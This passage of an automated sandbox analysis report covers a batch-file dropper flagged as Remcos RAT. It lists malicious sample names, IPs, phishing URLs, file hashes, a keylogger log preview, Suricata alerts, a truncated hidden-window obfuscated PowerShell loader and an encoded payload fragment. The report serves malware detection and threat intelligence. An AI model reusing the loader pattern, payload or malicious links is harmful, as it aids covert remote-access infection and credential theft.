                                                                1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 178.237.33.50
                                                                Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                remcos.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ASSEFLOWAmsterdamInternetExchangeAMS-IXITMcx2Xk0fqn.exeGet hashmaliciousLokibotBrowse
                                                                • 89.34.237.212
                                                                td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                                                                • 89.34.236.191
                                                                file.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                • 158.58.172.125
                                                                BKGCONF-THD1914129-BKGCONF-THD1914129.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 89.40.227.248
                                                                5f1uj5aMdD.elfGet hashmaliciousUnknownBrowse
                                                                • 95.141.43.103
                                                                file.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                • 83.136.106.50
                                                                yaALNupJCH.exeGet hashmaliciousAmadey, Remcos, VidarBrowse
                                                                • 95.141.41.12
                                                                szsLEDKLDZ.elfGet hashmaliciousUnknownBrowse
                                                                • 92.114.92.30
                                                                9nSv9py6hs.exeGet hashmaliciousDanaBotBrowse
                                                                • 95.141.32.211
                                                                file.exeGet hashmaliciousDanaBotBrowse
                                                                • 95.141.32.211
                                                                ATOM86-ASATOM86NLSecuriteInfo.com.Win32.MalwareX-gen.2964.2121.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                1729022872b8fae641a98b236571422197a34480f404f44291e36642b114aee58fc24f5bb1699.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                1729014968354a73a6dcba5a43f0dc2c4d615a55b43a024f5a7b8361ffa956895f39b62184812.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                • 178.237.33.50
                                                                Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 178.237.33.50
                                                                remcos.exeGet hashmaliciousRemcosBrowse
                                                                • 178.237.33.50
                                                                TES-ASROrComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 185.248.196.6
                                                                Bestellerinnerung - Rechnungsnummer 2024-507315.wsfGet hashmaliciousGuLoaderBrowse
                                                                • 185.248.196.6
                                                                EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                • 185.179.159.94
                                                                s7so8mnWZD.elfGet hashmaliciousUnknownBrowse
                                                                • 185.179.157.228
                                                                https://links.members.thrivent.com/ctt?m=22619476&r=NTYxNzAwMzczODg2S0&b=0&j=MjYyMTAzNzM2OAS2&k=Link31&kx=1&kt=1&kd=https://pro-consultanta.ro/cli/admine/748394////c3VwcG9ydEBtaWNyb2J5dGUuY28udWs=Get hashmaliciousHTMLPhisherBrowse
                                                                • 185.248.196.214
                                                                https://www.bing.com/ck/a?!&&p=3ae64310940abd2aJmltdHM9MTY4NjM1NTIwMCZpZ3VpZD0wYjRiZTJmYi02YzRhLTZjMjktMWRjMi1mMzk4NmRkYzZkMDAmaW5zaWQ9NTE3MQ&ptn=3&hsh=3&fclid=0b4be2fb-6c4a-6c29-1dc2-f3986ddc6d00&psq=htps+papadie++.++net&u=a1aHR0cHM6Ly9wYXBhZGllLm5ldC9wYXJ0aWVzLwGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.214
                                                                https://www.bing.com/ck/a?!&&p=3ae64310940abd2aJmltdHM9MTY4NjM1NTIwMCZpZ3VpZD0wYjRiZTJmYi02YzRhLTZjMjktMWRjMi1mMzk4NmRkYzZkMDAmaW5zaWQ9NTE3MQ&ptn=3&hsh=3&fclid=0b4be2fb-6c4a-6c29-1dc2-f3986ddc6d00&psq=htps+papadie++.++net&u=a1aHR0cHM6Ly9wYXBhZGllLm5ldC9wYXJ0aWVzLwGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.214
                                                                https://www.bing.com/ck/a?!&&p=3ae64310940abd2aJmltdHM9MTY4NjM1NTIwMCZpZ3VpZD0wYjRiZTJmYi02YzRhLTZjMjktMWRjMi1mMzk4NmRkYzZkMDAmaW5zaWQ9NTE3MQ&ptn=3&hsh=3&fclid=0b4be2fb-6c4a-6c29-1dc2-f3986ddc6d00&psq=htps+papadie++.++net&u=a1aHR0cHM6Ly9wYXBhZGllLm5ldC9wYXJ0aWVzLwGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.214
                                                                https://papadie.net/parties/Get hashmaliciousUnknownBrowse
                                                                • 185.248.196.214
                                                                https://(%5B084d549b35bfe07f5fc9414e12ebc18b%5D):%%5E*&*$%3E+%3C@301.link/Rq#bWFyay5odWRzb25AdmlyZ2lubW9uZXl1a3BsYy5jb20=Get hashmaliciousUnknownBrowse
                                                                • 185.248.196.102

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://sas.permanences7-7.fr/Get hashmaliciousUnknownBrowse
                                                                • 185.248.196.6
                                                                HjiFq7hzLA.lnkGet hashmaliciousMalLnkBrowse
                                                                • 185.248.196.6
                                                                205.batGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.6
                                                                VOqh54L08T.lnkGet hashmaliciousMalLnkBrowse
                                                                • 185.248.196.6
                                                                SecuriteInfo.com.Win32.MalwareX-gen.18789.18997.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 185.248.196.6
                                                                20042024150836 14.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 185.248.196.6
                                                                RFQ-2410-00048_Commercial list.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.248.196.6
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.248.196.6
                                                                RFQ-2410-00048_Commercial list.vbsGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.6
                                                                DHL TRACKING NUMBER.com.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 185.248.196.6
                                                                37f463bf4616ecd445d4a1937da06e19Waxings.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 185.248.196.6
                                                                RFQ-2410-00048_Commercial list.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.248.196.6
                                                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.248.196.6
                                                                RFQ-2410-00048_Commercial list_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 185.248.196.6
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.248.196.6
                                                                eptfydgqkrerhxuq.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                • 185.248.196.6
                                                                JUSTIFICANTE PAGO FRAS AGOSTO 2024 4302286.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 185.248.196.6
                                                                JUSTIFICANTE PAGO FRAS AGOSTO 2024 4302286.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 185.248.196.6
                                                                download.jsGet hashmaliciousUnknownBrowse
                                                                • 185.248.196.6
                                                                KULI500796821_PO20000003.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 185.248.196.6

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\remcos\logs.dat

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):246
                                                                Entropy (8bit):3.3612663250935837
                                                                Encrypted:false
                                                                SSDEEP:6:6lyDzlI5YcIeeDAlKe5q1gWAAe5q1gWAv:6lNec8e5BWFe5BW+
                                                                MD5:B12B5C452C8855C4E287ACB12111DE9E
                                                                SHA1:2571672D2C4C2C6E12B73687362B783D244FA570
                                                                SHA-256:E39577514F1A48299087DBEF5A094E7C2A2F9A76C598117F77E069D6D076C977
                                                                SHA-512:31111CAEB9EDAAB4FEB8D7316F782F0BB03A3698387424D1C734548BC297EF27F4C7107ABF835A35F24712DF511703E6943389CFD95B63E64E910937173157A5
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                Preview:....[.2.0.2.4./.1.0./.1.6. .0.7.:.0.8.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):956
                                                                Entropy (8bit):5.0171731747546415
                                                                Encrypted:false
                                                                SSDEEP:12:tkTLJend6CsGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkq:qpSdRNuKyGX85MEBZvXhNlT3/7l1DYro
                                                                MD5:A1F5E6C8E8A324DA09719245F0765794
                                                                SHA1:B63E1AA4D65D834217D3EFB10E5FE66AD6AC1A1B
                                                                SHA-256:BEE4123C9657E40CDF62ADECA224866FCF4EB16FA125D28646416A37AEBA20C9
                                                                SHA-512:D0841DE286A58A703072670A1A0F837C503D21298ABDB5A1EAF20C9109013E22931B380AFCED9A611761C5FAC5D9DBF1546C21B4998CD8980CBE62CBB69B6553
                                                                Malicious:false
                                                                Preview:{. "geoplugin_request":"155.94.241.186",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):8003
                                                                Entropy (8bit):4.840877972214509
                                                                Encrypted:false
                                                                SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                MD5:106D01F562D751E62B702803895E93E0
                                                                SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                Malicious:false
                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1940658735648508
                                                                Encrypted:false
                                                                SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                Malicious:false
                                                                Preview:@...e................................................@..........

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c13zdzdo.t5y.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehxfaa5c.rfc.psm1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq4uuvgp.t01.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntv3grvs.k0i.ps1

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\bhv792D.tmp

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x055f66bb, page size 32768, DirtyShutdown, Windows version 10.0
                                                                Category:dropped
                                                                Size (bytes):17301504
                                                                Entropy (8bit):0.8034575343924052
                                                                Encrypted:false
                                                                SSDEEP:6144:ydfjZb5aXEY2waXEY24URlIe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ++:AVu4e81ySaKKjgrONseWa
                                                                MD5:3E183CB192B5DED876AB55130A0847B2
                                                                SHA1:04D7FC15D852D90BD6A2E0522E142E62BA2B882E
                                                                SHA-256:8348288CB047B40594D8E2BD50309171A64571F2E897CD05F1DAF4C30CF5E32E
                                                                SHA-512:4F3E5AC73447813BBC30BF110DCC8506B5B4A354D056EA9946A02B2E79F246A66B633E81A2768DF57B3D2D1186DFF3EE8192C5245F320485500B4BAADC4E092F
                                                                Malicious:false
                                                                Preview:._f.... .......;!......E{ow("...{........................@...../....{.......|E.h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]................................... ......|E..................T.......|E..........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2
                                                                Entropy (8bit):1.0
                                                                Encrypted:false
                                                                SSDEEP:3:Qn:Qn
                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                Malicious:false
                                                                Preview:..

                                                                C:\Users\user\AppData\Roaming\Knighting.Pro

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):472124
                                                                Entropy (8bit):5.8445094797070825
                                                                Encrypted:false
                                                                SSDEEP:6144:qEE6UbiRqt2GWupM8IXzrO1ohGfmtOxJvmeM3+v+zf/3oKfHzD0Dej+3YSY6j5ON:qXbiR8zM82CCkSrXRzHYuRSJ9nqP
                                                                MD5:45A31D507DAA8B7547BECC027B4EB279
                                                                SHA1:2BF357D70917E9B156AB5792623A39A04637F871
                                                                SHA-256:2CBBFEC1A0FEFA995B236ED816AA23DC543AB2A76B1C36183A9A263DABCF8EEA
                                                                SHA-512:081019ECDC07A7907C471388CAEF4CD4E5DD434760FF7A1D84E41A6E3665A0C0B8BBF3797A3526A16AEEFF15405694E059C32FDA2DDB26CEA38AD08F5C492C1E
                                                                Malicious:false
                                                                Preview:6wJPh3EBm7tk0hAAcQGb6wJ3pwNcJARxAZvrAkD1uXSkG2BxAZtxAZuB6f1/ChVxAZvrAibBgcGJ2+60cQGb6wKGaHEBm3EBm7p/aBy1cQGb6wLa9esCq4VxAZsxynEBm+sClQqJFAtxAZvrAkp00eJxAZvrAmtng8EEcQGbcQGbgflckOgCfMxxAZtxAZuLRCQE6wLBaesCpN2Jw+sCr6VxAZuBw5x8JQFxAZtxAZu6/zOEEOsCzj9xAZuB8qF0qcFxAZvrAnj8gcKiuNIucQGbcQGbcQGbcQGbcQGb6wJ5d4sMEOsCqRrrAmvhiQwT6wI8qOsCkX5CcQGb6wKzjoH6KPUEAHXTcQGbcQGbiVwkDHEBm3EBm4HtAAMAAOsCaPXrAmIYi1QkCOsC2hPrAh47i3wkBHEBm+sC1mKJ63EBm3EBm4HDnAAAAHEBm+sCoRhT6wIrgusC8XVqQOsCzyLrAm6SievrAr6DcQGbx4MAAQAAAHD8AusCEnJxAZuBwwABAADrAhrZcQGbU+sCH8hxAZuJ6+sC4zzrAqSTibsEAQAA6wLSNOsCf7eBwwQBAADrArXO6wJslFPrAlzo6wJlcGr/cQGbcQGbg8IF6wJQZOsCjvgx9nEBm3EBmzHJ6wJRaHEBm4sa6wIqH3EBm0HrAode6wKdJDkcCnXycQGbcQGbRusCWFlxAZuAfAr7uHXdcQGb6wKMuotECvzrAg0ycQGbKfBxAZvrAjL1/9LrAhOo6wI8+boo9QQA6wLSdOsChHkxwHEBm+sCFYyLfCQM6wLqRXEBm4E0Bz9hHuDrAnQzcQGbg8AE6wLe5usCB6U50HXjcQGb6wKXTon76wJxH+sCl4D/1+sCeuLrAu9I12Me4D/lzYa6o0Vp2uDydHpwHGH79VzxPTSXBYaD/MCv4O+ElB9KYc4RCipm4O8OYvWDJ3tsHgShJC9hU2weA9pZUGDEzZ+UMmFwwu8an4wyYXF74/nZZWxjHuDs

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7070297602726994
                                                                Encrypted:false
                                                                SSDEEP:96:3KZOwCFoMTkvhkvCCta28MWY9jJbHKSd28MWY9jqbHKS+:6ZOdV3a2DvWSd2D0WS+
                                                                MD5:43D1562637276D19A014607894EB6526
                                                                SHA1:A735614DCBA5BAD7045C97515C2ADEBF249ADF4F
                                                                SHA-256:521164F19F637898B6497B30A9BC94B5C0D7DB6ED1257F26CF98CEAFE2E00037
                                                                SHA-512:35AF979B21B05BAA1774F2311A8C5C25D51790A324AADEBE3CEAA4952AFB68FF530FE32DEFC519E8615397B341B531A8B12857E8F6A55135C25F739F1A674F6B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d......4H......z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Q....Ao..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlPY.X....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....PY.X..Roaming.@......DWSlPY.X....C.......................I.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlPY.X....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlPY.X....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlPY.X....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlPY.X....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlPY.X....q...........

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ML923R17AT2O9ADJ3VKV.temp

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6222
                                                                Entropy (8bit):3.7070297602726994
                                                                Encrypted:false
                                                                SSDEEP:96:3KZOwCFoMTkvhkvCCta28MWY9jJbHKSd28MWY9jqbHKS+:6ZOdV3a2DvWSd2D0WS+
                                                                MD5:43D1562637276D19A014607894EB6526
                                                                SHA1:A735614DCBA5BAD7045C97515C2ADEBF249ADF4F
                                                                SHA-256:521164F19F637898B6497B30A9BC94B5C0D7DB6ED1257F26CF98CEAFE2E00037
                                                                SHA-512:35AF979B21B05BAA1774F2311A8C5C25D51790A324AADEBE3CEAA4952AFB68FF530FE32DEFC519E8615397B341B531A8B12857E8F6A55135C25F739F1A674F6B
                                                                Malicious:false
                                                                Preview:...................................FL..................F.".. ...d......4H......z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Q....Ao..........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlPY.X....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....PY.X..Roaming.@......DWSlPY.X....C.......................I.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlPY.X....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlPY.X....E.........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlPY.X....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlPY.X....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlPY.X....q...........

                                                                Static File Info

                                                                General

                                                                File type:ASCII text, with very long lines (6087), with no line terminators
                                                                Entropy (8bit):5.343799254718803
                                                                TrID:
                                                                  File name:MARSS-FILTRY_ZW015010024.bat
                                                                  File size:6'087 bytes
                                                                  MD5:23d982d0c7540551e840392de11571ae
                                                                  SHA1:8cae67ab610dab59bf722ef2c1db09038e5a712d
                                                                  SHA256:e5ebe4d8925853fc1f233a5a6f7aa29fd8a7fa3a8ad27471c7d525a70f4461b6
                                                                  SHA512:f14b081fccbb2db1021aa03c5033ec59e22650a439eb5097eca4a7dce52035c06ab6d454eca95778fafcc6fd35de699182b380d12ace9420153e5cad8b5298f4
                                                                  SSDEEP:96:AyZFysox3pf4I8GJqS+Pwx5oDf9uS5sKXyKf6adkNqTSN/pk44RFw6ABZ6hdpsSB:AQoxZ2GgZq5oDg6FXjf6aTYoIBAhj36y
                                                                  TLSH:5EC15C471A0BE475033228E79F010D054F6E42FA02648BC2B61B5A2152C9FD8793CEBC
                                                                  File Content Preview:start /min powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$

                                                                  File Icon

                                                                  Icon Hash:9686878b929a9886

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-16T13:08:16.357207+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54988794.198.96.16553848TCP
                                                                  2024-10-16T13:08:17.984442+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549895178.237.33.5080TCP
